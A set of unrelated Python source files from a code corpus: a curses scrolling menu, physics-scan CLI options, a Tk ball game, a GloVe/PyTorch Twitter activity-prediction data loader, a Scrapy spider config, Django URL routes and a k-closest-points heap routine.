                # Print
                if selected == i:
                    stdscr.addstr(y_position+i, x_position, self.items[i], curses.A_STANDOUT)
                else:
                    stdscr.addstr(y_position+i, x_position, self.items[i])
            stdscr.refresh()
            key = stdscr.getch()
            if key == curses.KEY_DOWN:
                selected = (selected + 1)%len(self.items)
            elif key == curses.KEY_UP:
                selected = (selected - 1)%len(self.items)
            elif key == curses.KEY_ENTER or key == 10 or key == 13:
                return self.items[selected]
            elif key == 27: # escape
                return None
# TODO: Replace with new list_menu function using items
class select_v_scrolling():
    """A vertically scrolling, centered selection menu.

    Keeps a sliding half-open window [start, end) over `items` so long lists
    scroll inside the terminal height (row 0 is reserved for the title).
    `display` returns the chosen item string, or None when the user presses
    ESC.
    """
    def __init__(self, items, title=""):
        self.items = items
        self.title = title
    def display(self, stdscr):
        """Run the selection loop on *stdscr* until Enter or ESC."""
        rows, cols = stdscr.getmaxyx()
        curses.noecho()
        curses.cbreak()
        curses.curs_set(0)
        self._selected = 0
        # Visible slice of items; leave room for the title row.
        self._window = [0, min(rows - 2,len(self.items))]
        while True:
            rows, cols = stdscr.getmaxyx()
            middle_column = int(cols / 2)
            half_length_of_message = int(len(self.title) / 2)
            x_position = middle_column - half_length_of_message
            stdscr.erase()
            stdscr.addstr(0, x_position, self.title+"\n", curses.A_BOLD)
            for i in range(self._window[0], self._window[1]):
                # Center each visible item; cursor row advances with addstr.
                half_length_of_message = int(len(self.items[i]) / 2)
                y_position = stdscr.getyx()[0]
                x_position = middle_column - half_length_of_message
                if self._selected == i:
                    stdscr.addstr(y_position, x_position,self.items[i]+"\n", curses.A_STANDOUT)
                else:
                    stdscr.addstr(y_position, x_position,self.items[i]+"\n")
            stdscr.refresh()
            key = stdscr.getch()
            keydict = {
                curses.KEY_DOWN:self.key_down,
                curses.KEY_UP:self.key_up
            }
            if key in keydict:
                keydict[key]()
            elif key in [curses.KEY_ENTER, 10, 13]:
                return self.items[self._selected]
            elif key == 27: # escape
                return None
    def key_up(self):
        """Move the selection up one item, scrolling the window as needed."""
        # BUG FIX: originally, pressing up at the very top decremented
        # `_selected` to -1 (losing the highlight and allowing further
        # underflow); clamp at the first item instead.
        if self._selected <= 0:
            return
        # BUG FIX: the scroll test was `_window[0] > 1`, which left item 0
        # unreachable once the list had scrolled; scroll whenever the
        # selection sits on the window's top edge.
        if self._window[0] == self._selected:
            self._window[0] -= 1
            self._window[1] -= 1
        self._selected -= 1
    def key_down(self):
        """Move the selection down one item, scrolling the window as needed."""
        # BUG FIX: originally, pressing down on the last item pushed
        # `_selected` past the end of `items`, causing an IndexError when
        # Enter was then pressed; clamp at the final item instead.
        if self._selected >= len(self.items) - 1:
            return
        if self._window[1] == self._selected + 1:
            self._window[0] += 1
            self._window[1] += 1
        self._selected += 1
if __name__ == "__main__":
    # Manual demo: a scrollable editor list mixing editable items and a
    # title row, run inside the curses wrapper (which restores the terminal
    # on exit).
    ed = list_editor([item_editor("one",1),
                      item_editor("Two","2"),
                      item_editor("Three",False),
                      item_editor("Two","2"),
                      item_editor("Three",False),
                      item_editor("Two","2"),
                      item_title("TITLE"),
                      item_editor("Three",False),
                      item_editor("Two","2"),
                      item_editor("Three",False),
                      item_editor("Two","2"),
                      item_editor("Three",False),
                      item_editor("Two","2"),
                      item_editor("Three",False),
                      item_editor("Four",True)])
    curses.wrapper(ed.display)
5155058 | <reponame>sbutalla/vfatqc-python-scripts
from gempython.utils.standardopts import parser
# Command-line options shared by the VFAT scan scripts, registered on the
# common gempython option parser imported above.
parser.add_option("--mspl", type="int", dest = "MSPL", default = 4,
                  help="Specify MSPL. Must be in the range 1-8 (default is 4)", metavar="MSPL")
parser.add_option("--nevts", type="int", dest="nevts",
                  help="Number of events to count at each scan point", metavar="nevts", default=1000)
parser.add_option("--scanmin", type="int", dest="scanmin",
                  help="Minimum value of scan parameter", metavar="scanmin", default=0)
parser.add_option("--scanmax", type="int", dest="scanmax",
                  help="Maximum value of scan parameter", metavar="scanmax", default=254)
# Bitmask: a set bit masks the corresponding VFAT (0x0 = none masked).
parser.add_option("--vfatmask", type="int", dest="vfatmask",
                  help="VFATs to be masked in scan & analysis applications (e.g. 0xFFFFF masks all VFATs)", metavar="vfatmask", default=0x0)
parser.add_option("--ztrim", type="float", dest="ztrim", default=4.0,
                  help="Specify the p value of the trim", metavar="ztrim")
12801362 | <gh_stars>0
#!/usr/bin/env python3
# coding:utf-8
# 改进小红球
class Ball:
    """Bouncing ball for a simple Tk breakout-style game."""
    def __init__(self, canvas, paddle, color):
        self.canvas = canvas
        self.paddle = paddle
        # Create the ball as a 15x15 oval and move it to its start position.
        self.id = canvas.create_oval(10, 10, 25, 25, fill=color)
        self.canvas.move(self.id, 245, 100)
        starts = [-3, -2, -1, 1, 2, 3]
        random.shuffle(starts)  # shuffle to pick a random horizontal speed
        self.x = starts[0]
        self.y = -3  # start moving upward
        self.canvas_height = self.canvas.winfo_height()  # canvas height in pixels
        self.canvas_width = self.canvas.winfo_width()  # canvas width in pixels
    def draw(self):
        """Advance the ball one step and bounce off the walls and the paddle.

        NOTE(review): relies on self.hit_paddle(), which is defined elsewhere
        in the original file (not visible in this excerpt).
        """
        self.canvas.move(self.id, self.x, self.y)
        pos = self.canvas.coords(self.id)  # current [x1, y1, x2, y2] bounds
        if pos[1] <= 0:
            self.y = 3  # bounced off the top: head down
        if pos[3] >= self.canvas_height:
            self.y = -3  # bounced off the bottom: head up
        if self.hit_paddle(pos) == True:
            self.y = -3  # bounced off the paddle: head up
        if pos[0] <= 0:
            self.x = 3  # bounced off the left wall
        if pos[2] >= self.canvas_width:
            self.x = -3  # bounced off the right wall
# Add the ball into the main loop.
# NOTE(review): `ball`, `tk` and `time` are created/imported elsewhere in
# the original file; this loop animates at roughly 100 frames per second.
while 1:
    ball.draw()
    tk.update_idletasks()
    tk.update()
    time.sleep(0.01)
| StarcoderdataPython |
6419113 | """Shared fixtures for test modules"""
import sys
import os
import emily
import pytest
# Directory of this test module and its bundled fixture data files.
curdir = os.path.dirname(__file__)
data_dir = os.path.join(curdir,'data')
@pytest.fixture
def app():
    """Start an Emily instance wired to the test brain and session vars."""
    brains = [os.path.join(data_dir, 'tests.json')]
    session_path = os.path.join(data_dir, 'session_vars_test.json')
    return emily.start_emily(
        more_brains=brains,
        disable_emily_defaults=True,
        session_vars_path=session_path,
        emily_port=8008,
    )
6506420 | <reponame>steve-wilson/activity_prediction
# Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
#
# MODIFIED BY <NAME>, 2018
import os
import pathlib
import numpy as np
import torch
import random
def get_batch(batch, word_vec, emb_dim=300):
    """Embed a batch of tokenised sentences into one padded tensor.

    Returns a (max_len, batch_size, emb_dim) float tensor of word vectors
    (zero-padded past each sentence's end) together with an int array of
    the true sentence lengths.
    """
    lengths = np.array([len(sent) for sent in batch])
    embed = np.zeros((np.max(lengths), len(batch), emb_dim))
    for col, sent in enumerate(batch):
        for row, word in enumerate(sent):
            embed[row, col, :] = word_vec[word]
    return torch.from_numpy(embed).float(), lengths
def get_word_dict(sentences):
    """Collect the vocabulary of *sentences* plus special tokens.

    Returns a dict whose keys are every whitespace-separated token seen,
    each mapped to an empty string (only key membership matters downstream).
    """
    word_dict = {}
    for sentence in sentences:
        for token in sentence.split():
            word_dict.setdefault(token, '')
    # Sentence delimiters and the padding token used by the encoder.
    for special in ('<s>', '</s>', '<p>'):
        word_dict[special] = ''
    return word_dict
def get_glove(word_dict, glove_path):
    """Load GloVe vectors for the words present in *word_dict*.

    Reads the text-format GloVe file at *glove_path* and returns a dict
    mapping each covered word to its numpy float vector.  Words without a
    GloVe entry are silently skipped; the coverage count is printed.
    """
    word_vec = {}
    # Explicit encoding: GloVe files are UTF-8, and the platform default
    # (e.g. cp1252 on Windows) can fail on non-ASCII tokens.
    with open(glove_path, encoding='utf-8') as f:
        for line in f:
            word, vec = line.split(' ', 1)
            if word in word_dict:
                word_vec[word] = np.array(list(map(float, vec.split())))
    print('Found {0}(/{1}) words with glove vectors'.format(
        len(word_vec), len(word_dict)))
    return word_vec
def get_glove_vocab(glove_path):
    """Return the set of all words that have a vector in the GloVe file."""
    vocab = set()
    with open(glove_path) as glove:
        for line in glove:
            # First space-separated field is the word; the rest is its vector.
            word, _vec = line.split(' ', 1)
            vocab.add(word)
    return vocab
def build_vocab(sentences, glove_path):
    """Build a word->vector dict covering the vocabulary of *sentences*."""
    vocabulary = get_word_dict(sentences)
    embeddings = get_glove(vocabulary, glove_path)
    print('Vocab size : {0}'.format(len(embeddings)))
    return embeddings
def load_vocab(vocab_path):
    """Read a previously saved vocabulary file (one word per line) as a set."""
    with open(vocab_path) as vocab_file:
        return {line.strip() for line in vocab_file}
def build_vocab_over_dir(data_path, glove_path, vocab_file_name):
    """Build (or load a cached) GloVe-covered vocabulary for a dataset tree.

    The vocabulary is the set of lower-cased, punctuation-stripped tokens
    from the tweets and profiles of all three splits that also appear in
    the GloVe file.  It is cached at <data_path>/<vocab_file_name> and
    re-used on later calls.  Returns the word->vector dict for it.
    """
    vocab_path = data_path.rstrip(os.sep) + os.sep + vocab_file_name
    if os.path.exists(vocab_path):
        # Cached vocabulary from a previous run.
        vocab = load_vocab(vocab_path)
    else:
        glove_vocab = get_glove_vocab(glove_path)
        vocab = set([])
        for subset in ['train','dev','test']:
            for text_dir in ['tweets','profiles']:
                for f in os.listdir(data_path + os.sep + subset + os.sep + text_dir):
                    with open(data_path + os.sep + subset + os.sep + text_dir + os.sep + f) as text_file:
                        for line in text_file.readlines():
                            words = line.strip().split()
                            # Keep only normalised tokens that GloVe can embed.
                            vocab |= set([w.lower().strip("""#()[]{}-=~.,?!:;"'""") for w in words if w.lower().strip("""#()[]{}-=~.,?!:;"'""") in glove_vocab])
        # Persist one word per line so future runs skip the full scan.
        with open(vocab_path,'w') as vocab_file:
            for word in vocab:
                vocab_file.write(word+'\n')
    embeddings = get_glove(vocab, glove_path)
    return embeddings
def get_nli(data_path):
    """Load SNLI-style train/dev/test splits from *data_path*.

    Expects line-aligned files s1.<split>, s2.<split> and labels.<split>.
    Returns three dicts with keys 's1', 's2' (lists of sentence strings)
    and 'label' (numpy int array: entailment=0, neutral=1, contradiction=2).
    """
    s1 = {}
    s2 = {}
    target = {}
    dico_label = {'entailment': 0, 'neutral': 1, 'contradiction': 2}
    for data_type in ['train', 'dev', 'test']:
        s1[data_type], s2[data_type], target[data_type] = {}, {}, {}
        s1[data_type]['path'] = os.path.join(data_path, 's1.' + data_type)
        s2[data_type]['path'] = os.path.join(data_path, 's2.' + data_type)
        target[data_type]['path'] = os.path.join(data_path,
                                                 'labels.' + data_type)
        s1[data_type]['sent'] = [line.rstrip() for line in
                                 open(s1[data_type]['path'], 'r')]
        s2[data_type]['sent'] = [line.rstrip() for line in
                                 open(s2[data_type]['path'], 'r')]
        target[data_type]['data'] = np.array([dico_label[line.rstrip('\n')]
                                              for line in open(target[data_type]['path'], 'r')])
        # The three files must stay line-aligned: one premise/hypothesis/label per row.
        assert len(s1[data_type]['sent']) == len(s2[data_type]['sent']) == \
            len(target[data_type]['data'])
        print('** {0} DATA : Found {1} pairs of {2} sentences.'.format(
            data_type.upper(), len(s1[data_type]['sent']), data_type))
    train = {'s1': s1['train']['sent'], 's2': s2['train']['sent'],
             'label': target['train']['data']}
    dev = {'s1': s1['dev']['sent'], 's2': s2['dev']['sent'],
           'label': target['dev']['data']}
    test = {'s1': s1['test']['sent'], 's2': s2['test']['sent'],
            'label': target['test']['data']}
    return train, dev, test
def alliter(path):
    """Yield the names of the non-directory entries directly under *path*."""
    for entry in pathlib.Path(path).iterdir():
        if entry.is_dir():
            continue
        yield entry.name
# alternative-- before each epoch begins, read all of the file names, shuffle,
# then save to a tmp file that the generator iterates through
def alliter2(path):
    """Yield the entry names under *path* in a freshly shuffled order.

    The shuffled listing is spooled through a temporary file (mirroring the
    original pre-epoch-shuffle design) so the name list itself need not stay
    in memory while iterating.

    Fixes vs. the original: the temp file was written to a hard-coded
    /scratch/... path (broken on any other machine) and was never removed.
    """
    import tempfile
    files = os.listdir(path)
    random.shuffle(files)
    with tempfile.NamedTemporaryFile('w+', suffix='.out', delete=False) as tmp_file:
        tmp_file.write('\n'.join(files))
        tmp_path = tmp_file.name
    del files
    try:
        with open(tmp_path, 'r') as tmp_file:
            for line in tmp_file:
                yield line.strip()
    finally:
        os.remove(tmp_path)
def alliter3(path):
    """Yield every entry name in *path*, in a freshly shuffled order."""
    names = os.listdir(path)
    random.shuffle(names)
    yield from names
# output should yield sets of files in the data path that are batch size
# (or smaller if there are not enough files left)
# data_path: where to get the files
# data_subset: which subdir to look in
def batch_generator(data_path, batch_size, data_subset):
    """Yield lists of at most *batch_size* user file names from a subset.

    The subset's 'profiles' directory is treated as the authoritative list
    of users; names come out in shuffled order (via alliter3) and the final
    batch may be smaller than *batch_size*.
    """
    profiles_dir = data_path + os.sep + data_subset + os.sep + 'profiles'
    current = []
    for name in alliter3(profiles_dir):
        current.append(name)
        if len(current) == batch_size:
            yield current
            current = []
    # Flush the leftover, smaller batch (if any).
    if current:
        yield current
#done -- make set of tweets randomly shuffle per user
# done -- make aggregator function robust to missing profiles/tweets (reduce batch size)
# done -- add into code with torch dataloader to see if this improves the performance!
# done -- test with max tweets = 100 first! why not start with that?
# done -- test with fewer hidden units first!
class APDataSet(torch.utils.data.Dataset):
    """Torch dataset of Twitter users for activity prediction.

    Each example is one user, assembled from parallel files named by user
    id under <data_path>/<subset>/: 'tweets' (or 'activities'),
    'profiles', optional 'values', and 'clusters_<n_classes>' targets.
    """
    def __init__(self, data_path, word_vec, word_emb_dim, n_classes, use_values=False, subset='train', max_num_tweets=100, use_activities=False, no_profiles=False, no_tweets=False, lmap={}, shuffle_input=True):
        # NOTE(review): mutable default lmap={} is shared across instances;
        # it is only read in this class, but confirm callers never mutate it.
        # The 'profiles' directory defines the set of users in this subset.
        self.files = os.listdir( os.path.join(data_path,subset,'profiles') )
        self.word_vec = word_vec          # word -> embedding vector dict
        self.word_emb_dim = word_emb_dim  # embedding dimensionality
        self.n_classes = n_classes        # number of target clusters
        self.use_values = use_values      # whether to load the 'values' features
        #self.subset = subset
        self.max_num_tweets = max_num_tweets  # cap on tweets kept per user
        self.prefix = os.path.join(data_path,subset) + os.sep
        self.use_activities = use_activities  # read 'activities' instead of 'tweets'
        self.no_profiles = no_profiles    # skip profile text entirely
        self.no_tweets = no_tweets        # skip tweet/activity text entirely
        self.lmap = lmap                  # optional raw->dense label remapping
        self.shuffle_input = shuffle_input  # shuffle tweets before truncating
    def __getitem__(self, index):
        """Return one user's data as the tuple
        (tweet_mat, tweet_lengths, profile_vec, profile_length,
         values, values_length, target)."""
        userid = self.files[index]
        tweet_mat = None
        tweet_lengths = None
        profile_vec = []
        profile_length = 0
        values = []
        values_length = 0
        target = None
        doc_type = 'activities' if self.use_activities else 'tweets'
        if not self.no_tweets:
            with open(self.prefix + doc_type + os.sep + userid) as tweet_file:
                tweets = [prepare_sentence(tweet,self.word_vec) for tweet in tweet_file.readlines()]
            # Drop tweets that became empty after token filtering.
            tweets = [tweet for tweet in tweets if tweet]
            # is this causing problems? do we need the same set of tweets each time in order to correctly learn?
            if self.shuffle_input:
                random.shuffle(tweets)
            if self.max_num_tweets:
                tweets = tweets[:self.max_num_tweets]
            tweet_lengths = np.array([len(tweet) for tweet in tweets])
            max_len = np.max(tweet_lengths)
            num_tweets = len(tweets)
            tweet_mat = np.zeros((max_len, num_tweets, self.word_emb_dim))
            # to_delete = []
            for i in range(num_tweets):
                length_i = tweet_lengths[i]
                # instead of deleting, treat empty tweets as if they contained 1 word
                # which we represent with a vector of all 0s
                if length_i <= 0:
                    # to_delete.append(i)
                    tweet_lengths[i] = 1
                for j in range(length_i):
                    tweet_mat[j, i, :] = self.word_vec[tweets[i][j]]
            # for del_idx in sorted(to_delete, reverse=True):
            #     tweet_lengths = np.delete(tweet_lengths, del_idx)
            #     tweet_mat = np.delete(tweet_mat,del_idx,1)
            tweet_mat = torch.from_numpy(tweet_mat).float()
        if not self.no_profiles:
            with open(self.prefix + 'profiles' + os.sep + userid) as profile_file:
                profile = prepare_sentence(profile_file.read().strip(),self.word_vec)
            profile_length = len(profile)
            if profile_length <= 0:
                # (sic: "emtpy" typo kept -- it is a runtime log string)
                print("emtpy profile for user:",userid)
            profile_vec = np.zeros((profile_length, self.word_emb_dim))
            for j in range(profile_length):
                profile_vec[j, :] = self.word_vec[profile[j]]
            #profile_vec = torch.from_numpy(profile_vec).float()
        # Values: just one vector of floats per user
        if self.use_values:
            with open(self.prefix + 'values' + os.sep + userid) as values_file:
                values = [float(x) for x in values_file.read().strip().split()]
            values_length = len(values)
            #values = np.array(values)
            #values = torch.from_numpy(values).float()
        # Target: correct cluster id (first id listed in the file)
        with open(self.prefix + 'clusters_' + str(self.n_classes) + os.sep + userid) as targets_file:
            ids = [int(x) for x in targets_file.read().strip().split()]
        # new way, just use first id as the target value
        target = ids[0]
        if self.lmap:
            # Remap the raw cluster id to its dense training label.
            target = self.lmap[target]
        #TODO remove this:
        return (tweet_mat, tweet_lengths, profile_vec, profile_length, values, values_length, target)
    def __len__(self):
        """Number of users in this subset."""
        return len(self.files)
    # def __add__(self, other):
    #
    #     raise NotImplementedError
    #     #TODO?
# expected input: tweet_mat, tweet_lengths, profile_vec, profile_length, values, values_length, target
def APcollate_fn(batch):
    """Collate APDataSet items into one batch.

    Tweets stay a ragged list of per-user tensors; profiles are padded into
    a single (max_len, batch, emb_dim) tensor.  Users with an empty profile
    are kept but given length 1 so downstream RNNs do not crash.  Users
    whose tweet tensor is None (no_tweets mode) are dropped from the batch.
    """
    # print("Initial batch size:",len(batch))
    # initial_batch_size = len(batch)
    tweet_mats = []
    tweet_length_arrs = []
    profile_vec_list = []
    profile_lengths = []
    values = []
    values_lengths = []
    targets = []
    for item in batch:
        # if item[3] > 0:
        if item[0] is not None:
            # Keep only users that actually have tweet tensors.
            tweet_mats.append(item[0])
            tweet_length_arrs.append(item[1])
            profile_vec_list.append(item[2])
            profile_lengths.append(item[3])
            if item[4] and item[5]:
                values.append(item[4])
                values_lengths.append(item[5])
            targets.append(item[6])
    batch_size = len(targets)
    # print("Final batch size:",batch_size)
    # assert len(tweet_mats) == batch_size
    # assert len(profile_vec_list) == batch_size
    # assert initial_batch_size == batch_size
    # tweets should be good to go
    # need to do padding for profiles
    profile_mat = torch.Tensor()
    max_profile_length = max(profile_lengths)
    if max_profile_length:
        profile_mat = np.zeros((max_profile_length, batch_size, profile_vec_list[0].shape[1]))
        for i in range(batch_size):
            if profile_lengths[i]:
                for j in range(profile_lengths[i]):
                    profile_mat[j,i,:] = profile_vec_list[i][j]
            # make empty profiles appear as length 1 containing only an all-zero vector word
            # otherwise rnns will crash...
            else:
                profile_lengths[i] = 1
        profile_mat = torch.from_numpy(profile_mat).float()
    # only need to include values if they are nonempty
    if values and values_lengths:
        values = np.array(values)
        values = torch.from_numpy(values).float()
        values_lengths = np.array(values_lengths)
    # targets should be good to go
    return tweet_mats, tweet_length_arrs, profile_mat, np.array(profile_lengths), values, values_lengths, np.array(targets)
def prepare_sentence(sentence, word_vec):
    """Tokenise *sentence* and keep only tokens covered by *word_vec*.

    Tokens are lower-cased and stripped of surrounding punctuation; the
    literal two-character sequence '\\n' is turned back into a real newline
    before splitting.
    """
    punct = """#()[]{}-=~.,?!:;"'"""
    raw_tokens = sentence.strip().replace(r'\n', '\n').split()
    normalised = (tok.lower().strip(punct) for tok in raw_tokens)
    return [tok for tok in normalised if tok in word_vec]
# this is where we actually load the data into memory
# output needs to be: tweets_batch, tweets_length, profile_batch, profile_length
# values_batch, values_length, target_batch
def load_batch(data_path, files_list, word_vec, word_emb_dim, n_classes, use_values=False, subset='train', max_num_tweets=100):
    """Load one batch of users from disk into model-ready tensors.

    Returns (tweet_mats, tweet_length_arrs, profile_mat, profile_lengths,
    values, values_lengths, targets):
      - tweet_mats: list of per-user (max_len, num_tweets, emb_dim) float tensors
      - tweet_length_arrs: list of per-user int arrays of tweet lengths
      - profile_mat: (max_profile_len, batch, emb_dim) float tensor
      - values / values_lengths: tensor + int array when use_values, else []
      - targets: int array of the first cluster id per user

    Users with an empty profile are dropped; *files_list* is mutated in
    place to reflect that.

    Fixes vs. the original: multi-user deletions now run in descending
    index order (the ascending loop shifted the remaining indices and could
    remove the wrong users), the defensive mismatch loop iterates a
    snapshot of files_list so in-loop removal cannot skip elements, and an
    unreachable duplicated code fragment after the return was deleted.
    """
    prefix = data_path + os.sep + subset + os.sep
    batch_size = len(files_list)
    # --- Tweets: one (max_len, num_tweets, word_dim) tensor per user ---
    tweet_mats = []
    tweet_length_arrs = []
    # Iterate over a snapshot: the fallback below may remove from files_list.
    for f_num, f in enumerate(list(files_list)):
        with open(prefix + 'tweets' + os.sep + f) as tweet_file:
            single_user_tweets = [prepare_sentence(t, word_vec) for t in tweet_file.readlines()]
        # Drop tweets that became empty after token filtering.
        single_user_tweets = [t for t in single_user_tweets if t != []]
        if max_num_tweets:
            single_user_tweets = single_user_tweets[:max_num_tweets]
        single_user_lengths = np.array([len(t) for t in single_user_tweets])
        max_len = np.max(single_user_lengths)
        num_tweets = len(single_user_tweets)
        tweet_mat = np.zeros((max_len, num_tweets, word_emb_dim))
        to_delete = []
        for i in range(num_tweets):
            length_i = len(single_user_tweets[i])
            if length_i <= 0:
                to_delete.append(i)
            for j in range(length_i):
                tweet_mat[j, i, :] = word_vec[single_user_tweets[i][j]]
        # Remove empty tweets back-to-front so indices stay valid.
        for del_idx in sorted(to_delete, reverse=True):
            single_user_lengths = np.delete(single_user_lengths, del_idx)
            tweet_mat = np.delete(tweet_mat, del_idx, 1)
        tweet_mats.append(torch.from_numpy(tweet_mat).float())
        tweet_length_arrs.append(single_user_lengths)
        # Defensive consistency check kept from the original code.
        if len(tweet_mats) != f_num + 1:
            print("Batch count off when processing file:", f, "len(tweet_mats), len(tweet_length_arrs:", len(tweet_mats), len(tweet_length_arrs))
            print("User_tweets:", single_user_tweets)
            print("Will try to avoid an error by skipping this user...")
            files_list.remove(f)
    # --- Profiles: one padded (max_len, batch, emb_dim) tensor ---
    profiles = []
    for f in files_list:
        with open(prefix + 'profiles' + os.sep + f) as profile_file:
            profiles.append(prepare_sentence(profile_file.read(), word_vec))
    profile_lengths = np.array([len(p) for p in profiles])
    max_len = np.max(profile_lengths)
    profile_mat = np.zeros((max_len, batch_size, word_emb_dim))
    to_delete = []
    for i in range(batch_size):
        length_i = len(profiles[i])
        if length_i <= 0:
            to_delete.append(i)
        for j in range(length_i):
            profile_mat[j, i, :] = word_vec[profiles[i][j]]
    # Drop users with empty profiles; descending order keeps the remaining
    # indices valid when more than one profile is empty.
    for del_idx in sorted(to_delete, reverse=True):
        print("Skipping user because of missing profile", files_list[del_idx], "profile:", profiles[del_idx])
        profile_lengths = np.delete(profile_lengths, del_idx)
        profile_mat = np.delete(profile_mat, del_idx, 1)
        files_list.pop(del_idx)
        tweet_mats.pop(del_idx)
        tweet_length_arrs.pop(del_idx)
    # now, things *should* line up
    print("Verify that sizes match-- len(tweet_mats), len(tweet_length_arrs), profile_mat.shape", len(tweet_mats), len(tweet_length_arrs), profile_mat.shape)
    profile_mat = torch.from_numpy(profile_mat).float()
    # --- Values: one (batch, n_values) tensor when requested ---
    values = []
    values_lengths = []
    if use_values:
        for f in files_list:
            with open(prefix + 'values' + os.sep + f) as values_file:
                values.append([float(x) for x in values_file.read().strip().split()])
        values_lengths = [len(v) for v in values]
        values_lengths = np.array(values_lengths)
        values = np.array(values)
        values = torch.from_numpy(values).float()
    # --- Targets: the first cluster id listed for each user ---
    targets_list = []
    for i, f in enumerate(files_list):
        with open(prefix + 'clusters_' + str(n_classes) + os.sep + f) as targets_file:
            ids = [int(x) for x in targets_file.read().strip().split()]
        # just use the first id as the (single-label) target value
        targets_list.append(ids[0])
    targets = np.array(targets_list)
    if len(tweet_mats) != batch_size:
        print("Warning, tweet mats is only size:", len(tweet_mats), '!')
    return tweet_mats, tweet_length_arrs, profile_mat, profile_lengths, values, values_lengths, targets
def load_weights(path):
    """Read whitespace-separated class weights from *path* into a tensor."""
    with open(path) as wfile:
        return torch.tensor([float(tok) for tok in wfile.read().split()])
def load_map(path, do_load):
    """Read a 'raw_label dense_label' file into an int->int dict.

    Returns an empty dict without touching the file when *do_load* is falsy.
    """
    if not do_load:
        return {}
    mapping = {}
    with open(path) as mfile:
        for line in mfile:
            if line:
                parts = line.strip().split()
                mapping[int(parts[0])] = int(parts[1])
    return mapping
def save_weights(w, path):
    """Write the weights to *path* as a single space-separated line."""
    serialized = ' '.join(str(wgt) for wgt in w)
    with open(path, 'w') as wfile:
        wfile.write(serialized)
def save_map(m, path):
    """Write each mapping entry to *path* as one 'key value' line."""
    with open(path, 'w') as mfile:
        for key, value in m.items():
            mfile.write('{0} {1}\n'.format(key, value))
def load_train_targets(datasetpath, n_classes, map_labels):
    """Collect the first cluster id of every training user.

    When *map_labels* is true, raw ids are densely re-indexed (0, 1, ...)
    in order of first appearance and the id->dense mapping is returned as
    the second element; otherwise that mapping is empty.
    """
    targets_dir = os.path.join(datasetpath, 'train', 'clusters_' + str(n_classes))
    y = []
    lmap = {}
    for fname in os.listdir(targets_dir):
        with open(os.path.join(targets_dir, fname)) as tfile:
            targets = [int(x) for x in tfile.read().strip().split()]
        first_id = targets[0]
        if map_labels:
            # Assign the next dense label on first sight of a raw id.
            lmap.setdefault(first_id, len(lmap))
            y.append(lmap[first_id])
        else:
            y.append(first_id)
    return y, lmap
# set weights to 1/count_in_training_data instead of 1 for everything
def get_weight_tensor(params):
    """Return (class_weight_tensor, label_map) for the training set.

    Weights follow the 'balanced' scheme n_samples / (n_classes * count);
    classes absent from the training data get weight 0.  Results are cached
    next to the dataset so later runs skip the recount.

    params: options object with datasetpath, n_classes and map_labels attrs.
    """
    weights_path = params.datasetpath.rstrip(os.sep) + os.sep + 'weights_' + str(params.n_classes) + '.out'
    map_path = params.datasetpath.rstrip(os.sep) + os.sep + 'map_' + str(params.n_classes) + '.out'
    # Cache hit (the map file is only required when labels are remapped).
    if os.path.exists(weights_path) and (not params.map_labels or os.path.exists(map_path)):
        return load_weights(weights_path), load_map(map_path, params.map_labels)
    else:
        y,l_map = load_train_targets(params.datasetpath, params.n_classes, params.map_labels)
        n_samples = len(y)
        y = np.array(y)
        counts = np.bincount(y)
        #print(counts, counts.shape)
        weights = n_samples / (params.n_classes * counts)
        # Classes with zero training examples divide to inf; zero them out.
        weights[weights==np.inf] = 0
        save_weights(weights, weights_path)
        if l_map:
            save_map(l_map, map_path)
        return (torch.from_numpy(weights).float(), l_map)
| StarcoderdataPython |
8124159 | <filename>scraper/storage_spiders/golmartvn.py
# Auto generated by generator.py. Delete this line if you make modification.
from scrapy.spiders import Rule
from scrapy.linkextractors import LinkExtractor
# XPath selectors used to extract each product field from golmart.vn pages
# (empty strings mean the field is not scraped for this site).
XPATH = {
    'name' : "//h1[@class='productName']",
    'price' : "//div[@id='ShowPrice']/@data-url",
    'category' : "",
    'description' : "//span[@class='grid sDes']/p",
    'images' : "//img[@class='imgDetailBig']/@src | //div[@class='bimg']/a/@href | //td[@class='bigimg']/div[@class='bimg']/a/@href",
    'canonical' : "",
    'base_url' : "",
    'brand' : ""
}
# Spider identity and crawl entry points.
name = 'golmart.vn'
allowed_domains = ['golmart.vn']
start_urls = ['http://www.golmart.vn/']
tracking_url = ''
sitemap_urls = ['']
sitemap_rules = [('', 'parse_item')]
sitemap_follow = []
# Product pages (/SanPham...) go to parse_item; listing pages (/DanhSach...)
# are crawled for further links.
rules = [
    Rule(LinkExtractor(allow=['/SanPham.*']), 'parse_item'),
    Rule(LinkExtractor(allow=['/DanhSach.*']), 'parse'),
    #Rule(LinkExtractor(), 'parse_item_and_links'),
]
5006971 | <filename>dj_lab/mysite/mysite/urls.py
from django.contrib import admin
from django.urls import path, include
# Project URL routes.  The polls app is mounted three times: once at its
# default namespace and twice under extra namespaces used to exercise
# URL-namespace resolution.
urlpatterns = [
    path('bands/', include('bands.urls')),
    path('news/', include('news.urls')),
    path('polls/', include('polls.urls')),
    path('author-polls/', include('polls.urls', namespace='author-polls')),
    path('publisher-polls/', include('polls.urls', namespace='publisher-polls')),
    path('polls-api/', include('polls_api.urls')),
    path('books/', include('books.urls')),
    path('admin/', admin.site.urls),
]
| StarcoderdataPython |
260984 | <reponame>E-G-C/algorithms
"""Given a list of points, find the k closest to the origin.
Idea: Maintain a max heap of k elements.
We can iterate through all points.
If a point p has a smaller distance to the origin than the top element of a
heap, we add point p to the heap and remove the top element.
After iterating through all points, our heap contains the k closest points to
the origin.
"""
from heapq import heapify, heappushpop
def k_closest(points, k, origin=(0, 0)):
    # Time: O(k+(n-k)logk)
    # Space: O(k)
    """Return the k points of *points* closest to *origin*.

    Python's heapq is a min-heap, so distances are stored negated: the heap
    root is then the *farthest* of the k current candidates and is evicted
    whenever a nearer point appears.
    """
    candidates = [(-distance(pt, origin), pt) for pt in points[:k]]
    heapify(candidates)
    for pt in points[k:]:
        # heappushpop keeps the heap at size k: push the new entry and pop
        # the root (current farthest candidate) in one O(log k) operation.
        # It is more efficient than a separate heappush + heappop, and the
        # conditional "is it closer?" check is implicit in the pop.
        heappushpop(candidates, (-distance(pt, origin), pt))
    # The heap now holds exactly the k nearest points (in heap order).
    return [pt for _, pt in candidates]
def distance(point, origin=(0, 0)):
    """Return the *squared* Euclidean distance between *point* and *origin*.

    The square root is deliberately omitted: squared distance preserves
    ordering, which is all the k-closest selection needs.
    """
    dx = point[0] - origin[0]
    dy = point[1] - origin[1]
    return dx * dx + dy * dy
| StarcoderdataPython |
